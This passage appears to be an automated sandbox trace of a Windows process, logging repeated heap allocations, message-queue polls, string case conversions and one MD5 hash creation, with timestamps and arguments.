(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.181] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.181] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.181] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.181] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.181] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.182] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.182] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.182] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.183] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0252.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.183] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0252.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.185] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.185] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.186] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.186] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.187] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.187] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.187] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.187] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.188] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.188] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.188] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.188] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.189] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.189] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.189] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.190] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.190] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.191] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.191] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.191] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.191] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.191] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.192] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.192] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.195] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.197] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.197] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 